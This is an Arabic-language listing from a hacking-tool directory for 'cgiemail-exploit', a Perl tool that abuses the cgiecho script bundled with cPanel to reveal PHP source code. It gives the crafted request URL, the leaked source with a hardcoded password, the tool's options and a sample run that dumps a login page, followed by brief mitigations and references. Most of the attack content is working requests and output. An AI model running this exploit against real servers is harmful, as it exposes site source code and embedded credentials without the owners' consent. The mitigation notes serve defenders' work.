Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cgiemail-exploit — Cgiemail - Source Code Disclosure/LFI | Kitploit
أدوات/GitHubGitHub/finbar-crago/cgiemail-exploit
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubfinbar-crago/cgiemail-exploit

cgiemail-exploit

Cgiemail - Source Code Disclosure/LFI

عرض المستودع
151منذ 9 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Cgiemail - استغلال كشف الكود المصدري/تضمين الملفات المحلي

cgiecho هو سكربت مضمّن مع cgiemail، سيعيد أي ملف ضمن جذر مستندات موقع الويب إذا كان الملف يحتوي على أقواس مربعة وكان النص داخل الأقواس قابلاً للتخمين.

cgiemail يُشحن حاليًا مع cPanel وهو مفعّل افتراضيًا.

screen-shot

مثال

للصفحة:

root@kitploit:~
<?php // http://hostname/login.php
if($_GET['user'] == 'admin' && $_GET['pass'] == 'thisissecure'){ /*...*/ }

الطلب:

root@kitploit:~
http://hostname/cgi-sys/cgiecho/login.php?'pass'=['pass']

الإرجاع:

root@kitploit:~
<HEAD><TITLE>Success</TITLE></HEAD>
<BODY>Processed form looks like this:<P><HR><PRE>
&lt;?php // http://hostname/login.php
if($_GET == 'admin' && $_GET['pass'] == 'thisissecure'){ /*..*/ }
</PRE><P>
<P><EM>cgiemail 
1.6
</EM></BODY>

cgiemail-exploit.pl

root@kitploit:~
Usage: ./cgiemail-exploit.pl [options] target

Options:
  --names         Check for names in commer separated list
  --num           Check for numbers
  --num-max       Maximum number to check (default 10)
  --php           Check PHP $_SERVER Variables
  --batch         Number of arguments sent per request (default 10)
  --cgiecho-path  Path of cgiecho on server (default '/cgi-sys/cgiecho/')
  --user-agent    Set user-agent (default 'Mozilla/5.0')
  --deley         Pause between requests in seconds (default 1)
  --timeout       Set connection timeout (default 10)

مثال

root@kitploit:~
$ ./cgiemail-exploit.pl --num --names 'email,password' http://hostname/login.php > login.php
detected cgiemail 1.6
request 1 of 2...
success!
url: http://hostname//cgi-sys/cgiecho/login.php?0=[0]&1=[1]&2=[2]&3=[3]&4=[4]&5=[5]&6=[6]&7=[7]&8=[8]&9=[9]&

ملاحظات تحذيرية

  • إذا لم يتم توفير قيمة لمتغير فسيتم استبعاده، لذا توقع رؤية بعض متغيرات '$_POST/$_GET' بدون []...

الحلول

  • لا تستخدم cgiemail...
  • عطّل cgiemail...
  • إذا كنت عالقًا لأي سبب كان على نظام يحتوي على cgiemail، فإن الحد الأقصى لطول المتغير هو 255؛ أي سلسلة طويلة داخل الأقواس المربعة ستؤدي إلى خطأ.
  • لا تستخدم الأقواس المربعة؟

المراجع

  • http://web.mit.edu/wwwdev/cgiemail/webmaster.html#security
  • https://documentation.cpanel.net/display/1144Docs/Tweak+Settings+-+Security#TweakSettings-Security-CGIEmailandCGIEcho
تنزيل الأداة